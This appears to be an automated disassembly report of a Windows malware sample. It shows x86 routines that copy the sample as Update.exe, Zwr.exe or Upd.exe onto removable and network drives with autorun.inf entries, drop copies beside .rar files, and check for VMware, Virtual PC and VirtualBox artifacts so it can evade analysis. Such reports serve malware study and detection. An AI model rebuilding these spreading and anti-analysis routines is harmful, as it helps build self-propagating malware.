0041365E jne 00413666h
00413660 mov al, 01h
00413662 jmp 0041368Fh
00413666 lea eax, dword ptr [ebp-00000400h] xrefs 0041365E
0041366C push eax
0041366D call 004132E0h
00413672 add esp, 04h
00413675 mov ecx, dword ptr [ebp-08h]
00413678 sub ecx, 01h
0041367B mov dword ptr [ebp-08h], ecx
0041367E jmp 00413637h xrefs 00413664
00413680 cmp dword ptr [ebp-00000408h], 02h xrefs 004135D3, 00413640
00413687 jne 0041368Dh
00413689 xor al, al
0041368B jmp 0041368Fh
0041368D xor al, al xrefs 0041359C, 00413687
0041368F mov esp, ebp xrefs 0041368B, 00413662
00413691 pop ebp
00413692 ret function end
Strings
  • \Upd.exe, va: 00411A9C
  • \Zwr.exe, va: 00411A44
  • [autorun]open=Zwr.exe, va: 00411A50
  • \autorun.inf, va: 00411A6C
  • \autorun.inf, va: 00411A7C
  • \autorun.inf, va: 00411A8C
  • \Update.exe, va: 004119E8
  • [autorun]open=Update.exe, va: 004119F4
  • \autorun.inf, va: 00411A14
  • \autorun.inf, va: 00411A24
  • \autorun.inf, va: 00411A34
Address Instruction Meta Information
004153C0 push ebp
004153C1 mov ebp, esp
004153C3 sub esp, 000000BCh
004153C9 push esi
004153CA push edi
004153CB mov eax, 00000001h xrefs 004156C4
004153D0 test eax, eax
004153D2 je 004156C9h
004153D8 push 0001D4C0h
004153DD call 00414180h
004153E2 mov dword ptr [ebp-04h], 00000000h
004153E9 jmp 004153F4h
004153F4 cmp dword ptr [ebp-04h], 18h xrefs 004153E9
004153F8 jnl 004156C4h
004153FE mov edx, dword ptr [ebp-04h]
00415401 mov eax, dword ptr [004010B0h+edx*4]
00415408 push eax
00415409 call 00414270h
0041540E cmp eax, 02h
00415411 jne 004154F5h
00415417 mov ecx, dword ptr [004119E8h] ASCII "\Update.exe"
0041541D mov dword ptr [ebp-28h], ecx
00415420 mov edx, dword ptr [004119ECh] 2E657461
00415426 mov dword ptr [ebp-24h], edx
00415429 mov eax, dword ptr [004119F0h] 00657865
0041542E mov dword ptr [ebp-20h], eax
00415431 xor ecx, ecx
00415433 mov dword ptr [ebp-1Ch], ecx
00415436 mov dword ptr [ebp-18h], ecx
00415439 mov dword ptr [ebp-14h], ecx
0041543C mov dword ptr [ebp-10h], ecx
0041543F mov word ptr [ebp-0Ch], cx
00415443 mov ecx, 00000006h
00415448 mov esi, 004119F4h ASCII "[autorun]open=Update.exe"
0041544D lea edi, dword ptr [ebp-5Ch]
00415450 rep movsd
00415452 movsw
00415454 movsb
00415455 xor edx, edx
00415457 mov dword ptr [ebp-41h], edx
0041545A mov dword ptr [ebp-3Dh], edx
0041545D mov dword ptr [ebp-39h], edx
00415460 mov dword ptr [ebp-35h], edx
00415463 mov dword ptr [ebp-31h], edx
00415466 mov word ptr [ebp-2Dh], dx
0041546A mov byte ptr [ebp-2Bh], dl
0041546D push 00411A10h
00415472 push 00411A14h ASCII "\autorun.inf"
00415477 call 004160ABh
0041547C add esp, 08h
0041547F mov dword ptr [ebp-08h], eax
00415482 lea eax, dword ptr [ebp-5Ch]
00415485 push eax
00415486 mov ecx, dword ptr [ebp-08h]
00415489 push ecx
0041548A call 004160BEh
0041548F add esp, 08h
00415492 mov edx, dword ptr [ebp-08h]
00415495 push edx
00415496 call 004160F5h
0041549B add esp, 04h
0041549E push 00000001h
004154A0 mov eax, dword ptr [ebp-04h]
004154A3 mov ecx, dword ptr [004010B0h+eax*4]
004154AA push ecx
004154AB push 00411A24h ASCII "\autorun.inf"
004154B0 call 004156E0h
004154B5 push 00411A34h ASCII "\autorun.inf"
004154BA call 0041609Bh
004154BF add esp, 04h
004154C2 lea edx, dword ptr [ebp-28h]
004154C5 push edx
004154C6 mov eax, dword ptr [ebp-04h]
004154C9 mov ecx, dword ptr [004010B0h+eax*4]
004154D0 push ecx
004154D1 call 00416005h
004154D6 add esp, 08h
004154D9 push 00000001h
004154DB mov edx, dword ptr [ebp-04h]
004154DE mov eax, dword ptr [004010B0h+edx*4]
004154E5 push eax
004154E6 push 004168F0h
004154EB call 004156E0h
004154F0 jmp 004156BFh
004154F5 mov ecx, dword ptr [ebp-04h] xrefs 00415411
004154F8 mov edx, dword ptr [004010B0h+ecx*4]
004154FF push edx
00415500 call 00414270h
00415505 cmp eax, 05h
00415508 jne 0041563Bh
0041550E mov eax, dword ptr [00411A44h] ASCII "\Zwr.exe"
00415513 mov dword ptr [ebp-000000A4h], eax
00415519 mov ecx, dword ptr [00411A48h] 6578652E
0041551F mov dword ptr [ebp-000000A0h], ecx
00415525 mov dl, byte ptr [00411A4Ch] 00
0041552B mov byte ptr [ebp-0000009Ch], dl
00415531 xor eax, eax
00415533 mov dword ptr [ebp-0000009Bh], eax
00415539 mov dword ptr [ebp-00000097h], eax
0041553F mov word ptr [ebp-00000093h], ax
00415546 mov byte ptr [ebp-00000091h], al
0041554C mov ecx, dword ptr [00411A50h] ASCII "[autorun]open=Zwr.exe"
00415552 mov dword ptr [ebp-00000090h], ecx
00415558 mov edx, dword ptr [00411A54h] 6E75726F
0041555E mov dword ptr [ebp-0000008Ch], edx
00415564 mov eax, dword ptr [00411A58h] 6F0A0D5D
00415569 mov dword ptr [ebp-00000088h], eax
0041556F mov ecx, dword ptr [00411A5Ch] 3D6E6570
00415575 mov dword ptr [ebp-00000084h], ecx
0041557B mov edx, dword ptr [00411A60h] 2E72775A
00415581 mov dword ptr [ebp-80h], edx
00415584 mov eax, dword ptr [00411A64h] 00657865
00415589 mov dword ptr [ebp-7Ch], eax
0041558C xor ecx, ecx
0041558E mov dword ptr [ebp-78h], ecx
00415591 mov dword ptr [ebp-74h], ecx
00415594 mov dword ptr [ebp-70h], ecx
00415597 mov dword ptr [ebp-6Ch], ecx
0041559A mov dword ptr [ebp-68h], ecx
0041559D mov dword ptr [ebp-64h], ecx
004155A0 mov word ptr [ebp-60h], cx
004155A4 push 00411A68h
004155A9 push 00411A6Ch ASCII "\autorun.inf"
004155AE call 004160ABh
004155B3 add esp, 08h
004155B6 mov dword ptr [ebp-000000A8h], eax
004155BC lea edx, dword ptr [ebp-00000090h]
004155C2 push edx
004155C3 mov eax, dword ptr [ebp-000000A8h]
004155C9 push eax
004155CA call 004160BEh
004155CF add esp, 08h
004155D2 mov ecx, dword ptr [ebp-000000A8h]
004155D8 push ecx
004155D9 call 004160F5h
004155DE add esp, 04h
004155E1 push 00000001h
004155E3 mov edx, dword ptr [ebp-04h]
004155E6 mov eax, dword ptr [004010B0h+edx*4]
004155ED push eax
004155EE push 00411A7Ch ASCII "\autorun.inf"
004155F3 call 004156E0h
004155F8 push 00411A8Ch ASCII "\autorun.inf"
004155FD call 0041609Bh
00415602 add esp, 04h
00415605 lea ecx, dword ptr [ebp-000000A4h]
0041560B push ecx
0041560C mov edx, dword ptr [ebp-04h]
0041560F mov eax, dword ptr [004010B0h+edx*4]
00415616 push eax
00415617 call 00416005h
0041561C add esp, 08h
0041561F push 00000001h
00415621 mov ecx, dword ptr [ebp-04h]
00415624 mov edx, dword ptr [004010B0h+ecx*4]
0041562B push edx
0041562C push 004168F0h
00415631 call 004156E0h
00415636 jmp 004156BFh
0041563B mov eax, dword ptr [ebp-04h] xrefs 00415508
0041563E mov ecx, dword ptr [004010B0h+eax*4]
00415645 push ecx
00415646 call 00414270h
0041564B cmp eax, 04h
0041564E jne 004156BFh
00415650 mov edx, dword ptr [00411A9Ch] ASCII "\Upd.exe"
00415656 mov dword ptr [ebp-000000BCh], edx
0041565C mov eax, dword ptr [00411AA0h] 6578652E
00415661 mov dword ptr [ebp-000000B8h], eax
00415667 mov cl, byte ptr [00411AA4h] 00
0041566D mov byte ptr [ebp-000000B4h], cl
00415673 xor edx, edx
00415675 mov dword ptr [ebp-000000B3h], edx
0041567B mov dword ptr [ebp-000000AFh], edx
00415681 mov word ptr [ebp-000000ABh], dx
00415688 mov byte ptr [ebp-000000A9h], dl
0041568E lea eax, dword ptr [ebp-000000BCh]
00415694 push eax
00415695 mov ecx, dword ptr [ebp-04h]
00415698 mov edx, dword ptr [004010B0h+ecx*4]
0041569F push edx
004156A0 call 00416005h
004156A5 add esp, 08h
004156A8 push 00000001h
004156AA mov eax, dword ptr [ebp-04h]
004156AD mov ecx, dword ptr [004010B0h+eax*4]
004156B4 push ecx
004156B5 push 004168F0h
004156BA call 004156E0h
004156BF jmp 004153EBh xrefs 0041564E, 00415636, 004154F0 swap point
004156C4 jmp 004153CBh xrefs 004153F8
004156C9 pop edi xrefs 004153D2
004156CA pop esi
004156CB mov esp, ebp
004156CD pop ebp
004156CE retn 0004h function end
Strings
  • %s\*.exe, va: 00411C04
Address Instruction Meta Information
00414630 push ebp xrefs 0041484B, 0041486D, 0041488F
00414631 mov ebp, esp
00414633 sub esp, 0000024Ch
00414639 mov eax, dword ptr [ebp+08h]
0041463C push eax
0041463D push 00411C04h ASCII "%s\*.exe"
00414642 lea ecx, dword ptr [ebp-00000108h]
00414648 push ecx
00414649 call 004141C0h
0041464E add esp, 0Ch
00414651 lea edx, dword ptr [ebp-00000248h]
00414657 push edx
00414658 lea eax, dword ptr [ebp-00000108h]
0041465E push eax
0041465F call 004140F0h
00414664 mov dword ptr [ebp-0000024Ch], eax
0041466A mov ecx, dword ptr [ebp+08h] xrefs 00414692
0041466D push ecx
0041466E lea edx, dword ptr [ebp-0000021Ch]
00414674 push edx
00414675 call 004145F0h
0041467A add esp, 08h
0041467D lea eax, dword ptr [ebp-00000248h]
00414683 push eax
00414684 mov ecx, dword ptr [ebp-0000024Ch]
0041468A push ecx
0041468B call 004141E0h
00414690 test eax, eax
00414692 jne 0041466Ah
00414694 mov esp, ebp
00414696 pop ebp
00414697 ret function end
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
Strings
  • vmusrvc.exe, va: 00411F10
  • vmsrvc.exe, va: 00411F1C
  • SYSTEM\ControlSet001\Services, va: 00411F28
  • vpcbus, va: 00411F48
  • vpc-s3, va: 00411F50
  • vpcuhub, va: 00411F58
  • msvmmouf, va: 00411F60
Address Instruction Meta Information
004127E0 push ebp xrefs 00414806
004127E1 mov ebp, esp
004127E3 sub esp, 000001E0h
004127E9 push esi
004127EA push edi
004127EB mov eax, dword ptr [00411F10h] ASCII "vmusrvc.exe"
004127F0 mov dword ptr [ebp-000001E0h], eax
004127F6 mov ecx, dword ptr [00411F14h] 2E637672
004127FC mov dword ptr [ebp-000001DCh], ecx
00412802 mov edx, dword ptr [00411F18h] 00657865
00412808 mov dword ptr [ebp-000001D8h], edx
0041280E xor eax, eax
00412810 mov dword ptr [ebp-000001D4h], eax
00412816 mov dword ptr [ebp-000001D0h], eax
0041281C mov ecx, dword ptr [00411F1Ch] ASCII "vmsrvc.exe"
00412822 mov dword ptr [ebp-000001CCh], ecx
00412828 mov edx, dword ptr [00411F20h] 652E6376
0041282E mov dword ptr [ebp-000001C8h], edx
00412834 mov ax, word ptr [00411F24h] 6578
0041283A mov word ptr [ebp-000001C4h], ax
00412841 mov cl, byte ptr [00411F26h] 00
00412847 mov byte ptr [ebp-000001C2h], cl
0041284D xor edx, edx
0041284F mov dword ptr [ebp-000001C1h], edx
00412855 mov dword ptr [ebp-000001BDh], edx
0041285B mov byte ptr [ebp-000001B9h], dl
00412861 xor eax, eax
00412863 mov word ptr [ebp-04h], ax
00412867 jmp 00412875h
00412869 mov cx, word ptr [ebp-04h] xrefs 004128A3
0041286D add cx, 0001h
00412871 mov word ptr [ebp-04h], cx
00412875 movzx edx, word ptr [ebp-04h] xrefs 00412867
00412879 cmp edx, 02h
0041287C jnl 004128A5h
0041287E movzx eax, word ptr [ebp-04h]
00412882 imul eax, eax, 14h
00412885 lea ecx, dword ptr [ebp+eax-000001E0h]
0041288C push ecx
0041288D call 00413380h
00412892 add esp, 04h
00412895 movzx edx, al
00412898 test edx, edx
0041289A je 004128A3h
0041289C mov al, 01h
0041289E jmp 004129A2h
004128A3 jmp 00412869h xrefs 0041289A
004128A5 mov ecx, 00000007h xrefs 0041287C
004128AA mov esi, 00411F28h ASCII "SYSTEM\ControlSet001\Services"
004128AF lea edi, dword ptr [ebp-000001B8h]
004128B5 rep movsd
004128B7 movsw
004128B9 mov eax, dword ptr [00411F48h] ASCII "vpcbus"
004128BE mov dword ptr [ebp-00000198h], eax
004128C4 mov cx, word ptr [00411F4Ch] 7375
004128CB mov word ptr [ebp-00000194h], cx
004128D2 mov dl, byte ptr [00411F4Eh] 00
004128D8 mov byte ptr [ebp-00000192h], dl
004128DE push 0000005Dh
004128E0 push 00000000h
004128E2 lea eax, dword ptr [ebp-00000191h]
004128E8 push eax
004128E9 call 00415F8Fh
004128EE add esp, 0Ch
004128F1 mov ecx, dword ptr [00411F50h] ASCII "vpc-s3"
004128F7 mov dword ptr [ebp-00000134h], ecx
004128FD mov dx, word ptr [00411F54h] 3373
00412904 mov word ptr [ebp-00000130h], dx
0041290B mov al, byte ptr [00411F56h] 00
00412910 mov byte ptr [ebp-0000012Eh], al
00412916 push 0000005Dh
00412918 push 00000000h
0041291A lea ecx, dword ptr [ebp-0000012Dh]
00412920 push ecx
00412921 call 00415F8Fh
00412926 add esp, 0Ch
00412929 mov edx, dword ptr [00411F58h] ASCII "vpcuhub"
0041292F mov dword ptr [ebp-000000D0h], edx
00412935 mov eax, dword ptr [00411F5Ch] 00627568
0041293A mov dword ptr [ebp-000000CCh], eax
00412940 push 0000005Ch
00412942 push 00000000h
00412944 lea ecx, dword ptr [ebp-000000C8h]
0041294A push ecx
0041294B call 00415F8Fh
00412950 add esp, 0Ch
00412953 mov edx, dword ptr [00411F60h] ASCII "msvmmouf"
00412959 mov dword ptr [ebp-6Ch], edx
0041295C mov eax, dword ptr [00411F64h] 66756F6D
00412961 mov dword ptr [ebp-68h], eax
00412964 mov cl, byte ptr [00411F68h] 00
0041296A mov byte ptr [ebp-64h], cl
0041296D push 0000005Bh
0041296F push 00000000h
00412971 lea edx, dword ptr [ebp-63h]
00412974 push edx
00412975 call 00415F8Fh
0041297A add esp, 0Ch
0041297D push 00000004h
0041297F lea eax, dword ptr [ebp-00000198h]
00412985 push eax
00412986 lea ecx, dword ptr [ebp-000001B8h]
0041298C push ecx
0041298D call 00413450h
00412992 add esp, 0Ch
00412995 movzx edx, al
00412998 test edx, edx
0041299A je 004129A0h
0041299C mov al, 01h
0041299E jmp 004129A2h
004129A0 xor al, al xrefs 0041299A
004129A2 pop edi xrefs 0041299E, 0041289E
004129A3 pop esi
004129A4 mov esp, ebp
004129A6 pop ebp
004129A7 ret function end
APIs
    • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
Strings
  • z:\, va: 00411D9C
Address Instruction Meta Information
00413ED0 push ebp
00413ED1 mov ebp, esp
00413ED3 sub esp, 08h
00413ED6 mov eax, dword ptr [00411D9Ch] ASCII "z:\"
00413EDB mov dword ptr [ebp-04h], eax
00413EDE push 00000104h
00413EE3 push 004163E8h
00413EE8 push 00000000h
00413EEA call 00414220h
00413EEF test eax, eax
00413EF1 jne 00413EFAh
00413EF3 push 00000000h
00413EF5 call 00414250h
00413EFA lea ecx, dword ptr [ebp-04h] xrefs 00413EF1, 00413F34
00413EFD push ecx
00413EFE call 00414270h
00413F03 mov dword ptr [ebp-08h], eax
00413F06 cmp dword ptr [ebp-08h], 03h
00413F0A je 00413F12h
00413F0C cmp dword ptr [ebp-08h], 04h
00413F10 jne 00413F25h
00413F12 lea edx, dword ptr [ebp-04h] xrefs 00413F0A
00413F15 push edx
00413F16 call 00414110h
00413F1B cmp eax, 01h
00413F1E jne 00413F25h
00413F20 call 00413D50h
00413F25 mov al, byte ptr [ebp-04h] xrefs 00413F1E, 00413F10
00413F28 sub al, 01h
00413F2A mov byte ptr [ebp-04h], al
00413F2D movsx ecx, byte ptr [ebp-04h]
00413F31 cmp ecx, 62h
00413F34 jne 00413EFAh
00413F36 mov eax, 00000001h
00413F3B mov esp, ebp
00413F3D pop ebp
00413F3E retn 0004h function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32First.KERNEL32, ref: 004136DA
Address Instruction Meta Information
004136C0 push ebp xrefs 004133DF
004136C1 mov ebp, esp
004136C3 mov eax, dword ptr [ebp+0Ch]
004136C6 push eax
004136C7 mov ecx, dword ptr [ebp+08h]
004136CA push ecx
004136CB push 6B5366BEh
004136D0 push 19F78C90h
004136D5 call 00415E40h
004136DA call eax Process32First@KERNEL32.DLL (Hidden Import)
004136DC pop ebp
004136DD retn 0008h function end
Strings
  • *.*, va: 00411D90
  • rar, va: 00411D98
  • C:\vm_tricks_sample.exe, va: 004163E8
Address Instruction Meta Information
00413D50 push ebp xrefs 00413F20, 00413DB0
00413D51 mov ebp, esp
00413D53 sub esp, 00000358h
00413D59 mov dword ptr [ebp-08h], 00000000h
00413D60 lea eax, dword ptr [ebp-00000250h]
00413D66 push eax
00413D67 push 00411D90h ASCII "*.*"
00413D6C call 004140F0h
00413D71 mov dword ptr [ebp-04h], eax
00413D74 cmp dword ptr [ebp-04h], FFFFFFFFh
00413D78 je 00413ECAh
00413D7E movsx ecx, byte ptr [ebp-00000224h] xrefs 00413EBB
00413D85 cmp ecx, 2Eh
00413D88 je 00413EA9h
00413D8E mov edx, dword ptr [ebp-00000250h]
00413D94 and edx, 10h
00413D97 mov dword ptr [ebp-00000250h], edx
00413D9D je 00413DC4h
00413D9F lea eax, dword ptr [ebp-00000224h]
00413DA5 push eax
00413DA6 call 00414110h
00413DAB cmp eax, 01h
00413DAE jne 00413DBFh
00413DB0 call 00413D50h
00413DB5 push 00411D94h
00413DBA call 00414110h
00413DBF jmp 00413EA9h xrefs 00413DAE
00413DC4 lea ecx, dword ptr [ebp-08h] xrefs 00413D9D
00413DC7 push ecx
00413DC8 lea edx, dword ptr [ebp-00000110h]
00413DCE push edx
00413DCF push 00000104h
00413DD4 lea eax, dword ptr [ebp-00000224h]
00413DDA push eax
00413DDB call 00414130h
00413DE0 test eax, eax
00413DE2 je 00413EA9h
00413DE8 lea ecx, dword ptr [ebp-00000110h]
00413DEE push ecx
00413DEF call 00414160h
00413DF4 push 00000003h
00413DF6 push 00411D98h ASCII "rar"
00413DFB lea edx, dword ptr [ebp-00000110h]
00413E01 push edx
00413E02 call 004140B0h
00413E07 lea eax, dword ptr [ebp+eax-00000113h]
00413E0E push eax
00413E0F call 00415F55h
00413E14 add esp, 0Ch
00413E17 test eax, eax
00413E19 jne 00413EA9h
00413E1F push 00001388h
00413E24 call 00414180h
00413E29 call 004141A0h
00413E2E push eax
00413E2F call 00415FC2h
00413E34 add esp, 04h
00413E37 push 00411928h
00413E3C call 00413800h
00413E41 add esp, 04h
00413E44 mov ecx, dword ptr [00411928h+eax*4]
00413E4B mov dword ptr [ebp-00000358h], ecx
00413E51 call 004141A0h
00413E56 push eax
00413E57 call 00415FC2h
00413E5C add esp, 04h
00413E5F call 00415FCCh
00413E64 xor edx, edx
00413E66 mov ecx, 00000004h
00413E6B div ecx
00413E6D mov dword ptr [ebp-00000354h], edx
00413E73 mov edx, dword ptr [ebp-00000358h]
00413E79 push edx
00413E7A lea eax, dword ptr [ebp-00000350h]
00413E80 push eax
00413E81 call 004141C0h
00413E86 add esp, 08h
00413E89 push 00000080h
00413E8E lea ecx, dword ptr [ebp-00000350h]
00413E94 push ecx
00413E95 push 004163E8h ASCII "C:\vm_tricks_sample.exe"
00413E9A lea edx, dword ptr [ebp-00000110h]
00413EA0 push edx
00413EA1 call 004138F0h
00413EA6 add esp, 10h
00413EA9 lea eax, dword ptr [ebp-00000250h] xrefs 00413D88, 00413DE2, 00413E19, 00413DBF
00413EAF push eax
00413EB0 mov ecx, dword ptr [ebp-04h]
00413EB3 push ecx
00413EB4 call 004141E0h
00413EB9 test eax, eax
00413EBB jne 00413D7Eh
00413EC1 mov edx, dword ptr [ebp-04h]
00413EC4 push edx
00413EC5 call 00414200h
00413ECA mov esp, ebp xrefs 00413D78
00413ECC pop ebp
00413ECD ret function end
Address Instruction Meta Information
00413450 push ebp xrefs 00412516, 00412742, 0041298D, 00412E52, 00412E16, 004132BE, 00413299
00413451 mov ebp, esp
00413453 sub esp, 00000118h
00413459 lea eax, dword ptr [ebp-04h]
0041345C push eax
0041345D push 00000008h
0041345F push 00000000h
00413461 mov ecx, dword ptr [ebp+08h]
00413464 push ecx
00413465 push 80000002h
0041346A call 00413720h
0041346F test eax, eax
00413471 jne 00413551h
00413477 mov dword ptr [ebp-08h], 00000000h
0041347E jmp 00413489h
00413480 mov edx, dword ptr [ebp-08h] xrefs 0041354C
00413483 add edx, 01h
00413486 mov dword ptr [ebp-08h], edx
00413489 mov eax, 00000001h xrefs 0041347E
0041348E test eax, eax
00413490 je 00413551h
00413496 mov dword ptr [ebp-00000118h], 000000FFh
004134A6 push 00000000h Count = 4
004134A8 lea ecx, dword ptr [ebp-00000118h]
004134AE push ecx
004134AF lea edx, dword ptr [ebp-00000110h]
004134B5 push edx
004134B6 mov eax, dword ptr [ebp-08h]
004134B9 push eax
004134BA mov ecx, dword ptr [ebp-04h]
004134BD push ecx
004134BE call 00413750h
004134C3 mov dword ptr [ebp-0Ch], eax
004134C6 mov byte ptr [ebp-11h], 00000000h
004134CA cmp dword ptr [ebp-0Ch], 00000000h
004134CE jne 00413536h
004134D0 mov dword ptr [ebp-00000114h], 00000000h
004134DA jmp 004134EBh
004134DC mov edx, dword ptr [ebp-00000114h] xrefs 00413532
004134E2 add edx, 01h
004134E5 mov dword ptr [ebp-00000114h], edx
004134EB movzx eax, word ptr [ebp+10h] xrefs 004134DA
004134EF cmp dword ptr [ebp-00000114h], eax
004134F5 jnc 00413534h
004134F7 mov ecx, dword ptr [ebp-00000114h]
004134FD imul ecx, ecx, 64h
00413500 add ecx, dword ptr [ebp+0Ch]
00413503 je 00413532h
00413505 lea edx, dword ptr [ebp-00000110h]
0041350B push edx
0041350C mov eax, dword ptr [ebp-00000114h]
00413512 imul eax, eax, 64h
00413515 add eax, dword ptr [ebp+0Ch]
00413518 push eax
00413519 call 00415F11h
0041351E add esp, 08h
00413521 test eax, eax
00413523 jne 00413532h
00413525 mov ecx, dword ptr [ebp-04h]
00413528 push ecx
00413529 call 00413790h
0041352E mov al, 01h
00413530 jmp 0041355Ch
00413532 jmp 004134DCh xrefs 00413503, 00413523
00413534 jmp 0041354Ch xrefs 004134F5
00413536 cmp dword ptr [ebp-0Ch], 00000103h xrefs 004134CE
0041353D jne 0041354Ch
0041353F mov edx, dword ptr [ebp-04h]
00413542 push edx
00413543 call 00413790h
00413548 xor al, al
0041354A jmp 0041355Ch
0041354C jmp 00413480h xrefs 0041353D, 00413534
00413551 mov eax, dword ptr [ebp-04h] xrefs 00413471, 00413490
00413554 push eax
00413555 call 00413790h
0041355A xor al, al
0041355C mov esp, ebp xrefs 00413530, 0041354A
0041355E pop ebp
0041355F ret function end
Strings
  • vboxservice.exe, va: 00411F6C
  • vboxtray.exe, va: 00411F7C
  • HARDWARE\ACPI\DSDT, va: 00411F8C
  • HARDWARE\ACPI\FADT, va: 00411FA0
  • HARDWARE\ACPI\RSDT, va: 00411FB4
  • SYSTEM\ControlSet001\Services, va: 00411FC8
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411FE8
  • HARDWARE\DESCRIPTION\System, va: 00412038
  • VBOX__, va: 00412054
  • VBoxMouse, va: 0041205C
  • VBoxGuest, va: 00412068
  • VBoxService, va: 00412074
  • VBoxSF, va: 00412080
  • Identifier, va: 00412088
  • SystemBiosVersion, va: 00412094
  • VBOX, va: 004120A8
Address Instruction Meta Information
004129B0 push ebp xrefs 00414812
004129B1 mov ebp, esp
004129B3 sub esp, 00000680h
004129B9 push esi
004129BA push edi
004129BB mov eax, dword ptr [00411F6Ch] ASCII "vboxservice.exe"
004129C0 mov dword ptr [ebp-0000067Ch], eax
004129C6 mov ecx, dword ptr [00411F70h] 76726573
004129CC mov dword ptr [ebp-00000678h], ecx
004129D2 mov edx, dword ptr [00411F74h] 2E656369
004129D8 mov dword ptr [ebp-00000674h], edx
004129DE mov eax, dword ptr [00411F78h] 00657865
004129E3 mov dword ptr [ebp-00000670h], eax
004129E9 xor ecx, ecx
004129EB mov dword ptr [ebp-0000066Ch], ecx
004129F1 mov edx, dword ptr [00411F7Ch] ASCII "vboxtray.exe"
004129F7 mov dword ptr [ebp-00000668h], edx
004129FD mov eax, dword ptr [00411F80h] 79617274
00412A02 mov dword ptr [ebp-00000664h], eax
00412A08 mov ecx, dword ptr [00411F84h] 6578652E
00412A0E mov dword ptr [ebp-00000660h], ecx
00412A14 mov dl, byte ptr [00411F88h] 00
00412A1A mov byte ptr [ebp-0000065Ch], dl
00412A20 xor eax, eax
00412A22 mov dword ptr [ebp-0000065Bh], eax
00412A28 mov word ptr [ebp-00000657h], ax
00412A2F mov byte ptr [ebp-00000655h], al
00412A35 mov ecx, dword ptr [00411F8Ch] ASCII "HARDWARE\ACPI\DSDT"
00412A3B mov dword ptr [ebp-00000580h], ecx
00412A41 mov edx, dword ptr [00411F90h] 45524157
00412A47 mov dword ptr [ebp-0000057Ch], edx
00412A4D mov eax, dword ptr [00411F94h] 5043415C
00412A52 mov dword ptr [ebp-00000578h], eax
00412A58 mov ecx, dword ptr [00411F98h] 53445C49
00412A5E mov dword ptr [ebp-00000574h], ecx
00412A64 mov dx, word ptr [00411F9Ch] 5444
00412A6B mov word ptr [ebp-00000570h], dx
00412A72 mov al, byte ptr [00411F9Eh] 00
00412A77 mov byte ptr [ebp-0000056Eh], al
00412A7D push 00000051h
00412A7F push 00000000h
